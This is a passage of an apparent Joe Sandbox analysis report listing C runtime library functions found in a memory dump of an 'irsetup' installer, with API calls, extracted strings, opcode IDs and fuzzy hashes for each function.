                                                                                                                    • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                    • API String ID: 3085332118-232180764
                                                                                                                    • Opcode ID: 8f431ba8dc0e35966c13d23202dae3974de4cf8e8649169e699a89669a8de12d
                                                                                                                    • Instruction ID: dfefc03f7fba11b39094b96e9353418926974b70fd291aca694570e016384653
                                                                                                                    • Opcode Fuzzy Hash: 8f431ba8dc0e35966c13d23202dae3974de4cf8e8649169e699a89669a8de12d
                                                                                                                    • Instruction Fuzzy Hash: 6E513E31606B0880FDE7DB56BC957EA23906B4EBC4F4A8425BD4D037A2EE78C74D8354
                                                                                                                    Function 000000018002B1B8 Relevance: 30.5, APIs: 20, Instructions: 485COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    • Opcode ID: 83bcc1b7ed02ac48ed80f5db585f6cc6e072ce756355eb0b1e4c509f4418eeb5
                                                                                                                    • Instruction ID: 55b8966ed909c531b91f61cb8372e423ff6e17214bc975dbaad7cba1e7de9a49
                                                                                                                    • Opcode Fuzzy Hash: 83bcc1b7ed02ac48ed80f5db585f6cc6e072ce756355eb0b1e4c509f4418eeb5
                                                                                                                    • Instruction Fuzzy Hash: BF22F472204AC882E7E39B55E4843ED2B91F3897D4F98C516FA5A877D2DE38C64DC302
                                                                                                                    Function 000000018002CB8C Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 211COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno_wsopen_s
                                                                                                                    • String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
                                                                                                                    • API String ID: 1497100469-1561892669
                                                                                                                    • Opcode ID: 809ac7aed290ffe497205082508d5eeb03938b6ee526942d5b77e887368b1888
                                                                                                                    • Instruction ID: d6da21fed4115c722398ce3e3561bd801ec631ccb665ac6cd961f74e4c6af8c6
                                                                                                                    • Opcode Fuzzy Hash: 809ac7aed290ffe497205082508d5eeb03938b6ee526942d5b77e887368b1888
                                                                                                                    • Instruction Fuzzy Hash: BF81B3B2A0824C45FBF74A25A904FEA5FC1675D7C4F29C425FE4A069D6DE79CB488303
                                                                                                                    Function 00000001800383A0 Relevance: 24.3, APIs: 16, Instructions: 348COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CompareStringW.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 000000018003840D
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 0000000180038421
                                                                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 0000000180038524
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CompareErrorInfoLastString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3723911898-0
                                                                                                                    • Opcode ID: a7c54db4274c7bd852224f2bab33c57a8df35dff28d89205a04333a6085d80a5
                                                                                                                    • Instruction ID: caf065914ce32c901bdc0da071f13ae403a8d6858991746fbe812b61d08b1fd8
                                                                                                                    • Opcode Fuzzy Hash: a7c54db4274c7bd852224f2bab33c57a8df35dff28d89205a04333a6085d80a5
                                                                                                                    • Instruction Fuzzy Hash: 77E1AE722047888AEBB39F2194443EA2B92BB497D4F56C565FA5A47BC4DF38CB489700
                                                                                                                    Function 000000018003CAA8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 197processsynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleProcess__doserrno_errno$CodeCreateErrorExitLastObjectSingleWaitfree
                                                                                                                    • String ID: cmd.exe
                                                                                                                    • API String ID: 1143201056-723907552
                                                                                                                    • Opcode ID: 1ec64bca767f0ce2c30d7568805568113e7c73b22f9ca0acadf98c084daf04b7
                                                                                                                    • Instruction ID: bc4d664b3f0a0b6ab182b77c7d05c4b3f8bc629965aac2ee09c429f38f9c3594
                                                                                                                    • Opcode Fuzzy Hash: 1ec64bca767f0ce2c30d7568805568113e7c73b22f9ca0acadf98c084daf04b7
                                                                                                                    • Instruction Fuzzy Hash: 4181B432204A8881EBA38B25E4817EF7761F3897E4F56C212FA59837D1DF79C649C702
                                                                                                                    Function 00000001800124E0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 179COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 000000018002753C: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,000000018001252F), ref: 000000018002754A
                                                                                                                      • Part of subcall function 000000018002721C: __getgmtimebuf.LIBCMT ref: 000000018002722E
                                                                                                                    • wcsftime.LIBCMT ref: 0000000180012761
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$FileSystem__getgmtimebufwcsftime
                                                                                                                    • String ID: !$%$day$hour$isdst$min$month$sec$wday$yday$year
                                                                                                                    • API String ID: 599264643-611614131
                                                                                                                    • Opcode ID: e8d60ccf7bee7e749e5e1b2cbf8c68d472027f5cf3e427ad52023df90c5721df
                                                                                                                    • Instruction ID: 3f311966028a47db9d835d2390ad335689aacd3f767fa76c62ac224867e760a9
                                                                                                                    • Opcode Fuzzy Hash: e8d60ccf7bee7e749e5e1b2cbf8c68d472027f5cf3e427ad52023df90c5721df
                                                                                                                    • Instruction Fuzzy Hash: 1F71B271204AC889EBA6EB21E4513EA7352EB8D7D1F48C212BD5A073DADE38C70DC740
                                                                                                                    Function 0000000180028660 Relevance: 18.1, APIs: 11, Strings: 1, Instructions: 90COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                    • String ID: %.14g
                                                                                                                    • API String ID: 1012874770-3267037135
                                                                                                                    • Opcode ID: 47d9f555a568b6f0783db94f213f62370508f50826c306b4ac1c19de6a4250bd
                                                                                                                    • Instruction ID: af0bc440c63a20798cdb7aeb7fc5255632f61c08f109e4c0f4434e2bfff94dc4
                                                                                                                    • Opcode Fuzzy Hash: 47d9f555a568b6f0783db94f213f62370508f50826c306b4ac1c19de6a4250bd
                                                                                                                    • Instruction Fuzzy Hash: EF41EE36602A8884EFE79F65D4553FC2360AB8CBD8F188432FA194A795CF74CB99D710
                                                                                                                    Function 000000018002C2FC Relevance: 18.1, APIs: 12, Instructions: 82COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1575098132-0
                                                                                                                    • Opcode ID: 45039a1f34f5a8ca6a309a91bc759b7c570e1b30efeed7530d3bf206d5ce8a12
                                                                                                                    • Instruction ID: cb46baaaa23a1663d07188939efbc8fc8364fa3fc97ea10782da97baff015f18
                                                                                                                    • Opcode Fuzzy Hash: 45039a1f34f5a8ca6a309a91bc759b7c570e1b30efeed7530d3bf206d5ce8a12
                                                                                                                    • Instruction Fuzzy Hash: D6310E35302A4885FEEBEB659061BFC2351AF8DBC4F48D526F91A476C6CE54CB4C8316
                                                                                                                    Function 000000018003B0E8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 256COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
                                                                                                                    • String ID: COMSPEC
                                                                                                                    • API String ID: 3451773520-1631433037
                                                                                                                    • Opcode ID: 138668e7748e24d3d92ce4ae88ceeb87a22b90512250c6b183fbb027a10e2112
                                                                                                                    • Instruction ID: 4ba3cebf007e37312f75b89635b496495a772fde7ddc12decf222640a794de8d
                                                                                                                    • Opcode Fuzzy Hash: 138668e7748e24d3d92ce4ae88ceeb87a22b90512250c6b183fbb027a10e2112
                                                                                                                    • Instruction Fuzzy Hash: 4EA1B036601A9C81FAE3AB15A9003EF6391F7887DCF56C615BB5A87785CF38879D8300
                                                                                                                    Function 0000000180036A98 Relevance: 15.3, APIs: 10, Instructions: 253COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$ErrorInfoLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 189849726-0
                                                                                                                    • Opcode ID: fdc52e7ef457eee3671ced87c46925b60b1a97f1e4e84eb13b3e6ac80a3ae5b4
                                                                                                                    • Instruction ID: 0cfcddc6f49efeab6f4f61afc9e86eb49e25840f6bfa506a9695891ebaf45d4b
                                                                                                                    • Opcode Fuzzy Hash: fdc52e7ef457eee3671ced87c46925b60b1a97f1e4e84eb13b3e6ac80a3ae5b4
                                                                                                                    • Instruction Fuzzy Hash: 27B19F32604AD486DBA2CF25E4503EEB7A4F748B84F95C126FB99877A5DF38C649C700
                                                                                                                    Function 000000018003D45C Relevance: 15.2, APIs: 10, Instructions: 177COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4B2
                                                                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4D1
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D576
                                                                                                                    • malloc.LIBCMT ref: 000000018003D58D
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D5D5
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D610
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D64C
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D68C
                                                                                                                    • free.LIBCMT ref: 000000018003D69A
                                                                                                                    • free.LIBCMT ref: 000000018003D6BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$Infofree$malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1309074677-0
                                                                                                                    • Opcode ID: 8833ed16186a4408ec5588ce627eacfd5c2b61c901c329b3215a334107bb986e
                                                                                                                    • Instruction ID: ef16a251ce0a63a525c3aa4d0bbb8d493572552397f9166123f23fc75798a009
                                                                                                                    • Opcode Fuzzy Hash: 8833ed16186a4408ec5588ce627eacfd5c2b61c901c329b3215a334107bb986e
                                                                                                                    • Instruction Fuzzy Hash: DA61E432204B8886E7A39F25B4403EB77D5F7897E8F158626FA5A43BD4DF38C6498700
                                                                                                                    Function 0000000180038D00 Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 994105223-0
                                                                                                                    • Opcode ID: b562fa2b34240d575bd56bcb114a87d5ce86f3de295457b19021f060fd77cd6e
                                                                                                                    • Instruction ID: d9ef7338b76749b8665854ab0faee35fb482f0185a0d43e1efd96c80377bbde6
                                                                                                                    • Opcode Fuzzy Hash: b562fa2b34240d575bd56bcb114a87d5ce86f3de295457b19021f060fd77cd6e
                                                                                                                    • Instruction Fuzzy Hash: 3E41C33260475C82EAE7AF12A9443AB7791BB5CBC0F1AC454FA4707BA9CF78D658D300
                                                                                                                    Function 0000000180003220 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 134COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_wfreopen
                                                                                                                    • String ID: =stdin$@%s$cannot %s %s: %s$open$read$reopen
                                                                                                                    • API String ID: 1073068216-1171916245
                                                                                                                    • Opcode ID: d7e4a053d725cb62ee5042be342918985159208fa4f717f7af988af5555a754d
                                                                                                                    • Instruction ID: 1853566ffd4394b5b462cd73b286757f755f6c0d306ff0bd9e01786340f21f8e
                                                                                                                    • Opcode Fuzzy Hash: d7e4a053d725cb62ee5042be342918985159208fa4f717f7af988af5555a754d
                                                                                                                    • Instruction Fuzzy Hash: 8051B731214A8881FEE7EB66A5813EE7795AB8E7C0F44D112FA4A47796DF38C34D8740
                                                                                                                    Function 0000000180037A04 Relevance: 13.7, APIs: 9, Instructions: 173COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037A64
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037A76
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037AD6
                                                                                                                    • malloc.LIBCMT ref: 0000000180037B42
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037B8C
                                                                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037BA3
                                                                                                                    • free.LIBCMT ref: 0000000180037BB4
                                                                                                                    • GetStringTypeA.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037C31
                                                                                                                    • free.LIBCMT ref: 0000000180037C41
                                                                                                                      • Part of subcall function 000000018003D45C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4B2
                                                                                                                      • Part of subcall function 000000018003D45C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4D1
                                                                                                                      • Part of subcall function 000000018003D45C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D5D5
                                                                                                                      • Part of subcall function 000000018003D45C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D610
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLastmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3804003340-0
                                                                                                                    • Opcode ID: ac954491406045a83ae058f29b84b2635aa9f93dc0ff5126d077dd45d2821ec1
                                                                                                                    • Instruction ID: b72f06588925f2ba8d140ce4529a3e9eb07fecfdf33ec2bb692ee0be162e1f54
                                                                                                                    • Opcode Fuzzy Hash: ac954491406045a83ae058f29b84b2635aa9f93dc0ff5126d077dd45d2821ec1
                                                                                                                    • Instruction Fuzzy Hash: 1F618232300A888AE7B39F25E4407DAA7A2F74CBE8F158615FA1D53BD5DF74CA498740
                                                                                                                    Function 000000018002097C Relevance: 13.6, APIs: 9, Instructions: 98COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2551688548-0
                                                                                                                    • Opcode ID: 91fa77b406ca58debd3888dab31120533d0dae9adbe6a87bb51551a7cd56bf2b
                                                                                                                    • Instruction ID: 0925ad66611745c8ce2a8e9b3f352f1836afede7ec58ebd276bd38845fb38505
                                                                                                                    • Opcode Fuzzy Hash: 91fa77b406ca58debd3888dab31120533d0dae9adbe6a87bb51551a7cd56bf2b
                                                                                                                    • Instruction Fuzzy Hash: D1416D31212B4885EAE3DB11E8817DA63A4B78C7C4F64C025BA8D437A7EF78C65D8742
                                                                                                                    Function 0000000180032F64 Relevance: 13.6, APIs: 9, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    • Opcode ID: f65c103c47602ed978b93713e1d3f39d8ad6cd9bee0c213a3201f4354ec7b13a
                                                                                                                    • Instruction ID: a7b466250e8cbf9d99a39da3f19165df2e40a545f04f40789bff1e1118104bb7
                                                                                                                    • Opcode Fuzzy Hash: f65c103c47602ed978b93713e1d3f39d8ad6cd9bee0c213a3201f4354ec7b13a
                                                                                                                    • Instruction Fuzzy Hash: 0E31073261068841F797AF26A8827EE7751B7C97E0F56C616FA69077D2CE38C609C700
                                                                                                                    Function 0000000180039498 Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
